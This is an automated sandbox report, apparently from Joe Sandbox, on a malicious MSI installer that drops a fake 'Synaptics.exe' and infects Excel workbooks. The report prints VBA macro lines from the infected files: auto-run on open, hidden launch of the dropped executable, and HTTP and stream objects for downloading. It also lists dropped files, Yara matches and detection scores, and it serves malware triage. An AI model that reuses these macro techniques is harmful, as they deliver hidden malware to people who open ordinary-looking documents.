                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49764 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49764 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49767 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49770 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49769 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49776 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49793 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49795 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49796 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49805 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49813 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49815 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49828 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49838 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49839 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49847 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49846 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49863 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49882 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49885 version: TLS 1.2

                              System Summary

                              barindex
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: EbdP5pVY.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: NVWZAPQSQL.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: EbdP5pVY.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: NVWZAPQSQL.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: EbdP5pVY.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: NVWZAPQSQL.xlsm.4.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\674551.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4699.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4755.tmpJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile created: C:\Windows\SysWOW64\._cache_MSI4755.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI4755.tmpJump to behavior
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: EbdP5pVY.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: NVWZAPQSQL.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX49C5.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\Synaptics.exe C1317DA0FD0DC3D73B38634EA586016F6F651F52ACC576FBAE8B82721C83E9AE
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 3156
                              Source: MSI4755.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: MSI4755.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: Synaptics.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX49C5.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.4.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: valyzt.msiBinary or memory string: OriginalFileName vs valyzt.msi
                              Source: valyzt.msiBinary or memory string: OriginalFilenameb! vs valyzt.msi
                              Source: classification engineClassification label: mal100.troj.expl.evad.winMSI@9/58@8/3
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML4745.tmpJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6520
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF044B9400AF3F8FCD.TMPJump to behavior
                              Source: Yara matchFile source: valyzt.msi, type: SAMPLE
                              Source: Yara matchFile source: 3.0.MSI4755.tmp.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX49C5.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI4699.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\674551.msi, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI4755.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Windows\Installer\MSI4755.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: valyzt.msiVirustotal: Detection: 70%
                              Source: valyzt.msiReversingLabs: Detection: 65%
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\valyzt.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4755.tmp "C:\Windows\Installer\MSI4755.tmp"
                              Source: C:\Windows\Installer\MSI4755.tmpProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 3156
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4755.tmp "C:\Windows\Installer\MSI4755.tmp"Jump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: wsock32.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: twext.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: appresolver.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: cscapi.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: twext.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: policymanager.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: cscapi.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: acppage.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: aepic.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: edputil.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\uVJsIeF.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: valyzt.msiStatic file information: File size 1748992 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Jump to dropped file
                              Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI4755.tmpJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile created: C:\Windows\SysWOW64\._cache_MSI4755.tmpJump to dropped file
                              Source: C:\Windows\Installer\MSI4755.tmpFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Jump to dropped file
                              Source: C:\Windows\Installer\MSI4755.tmpFile created: C:\ProgramData\Synaptics\RCX49C5.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4755.tmpJump to dropped file
                              Source: C:\Windows\Installer\MSI4755.tmpFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
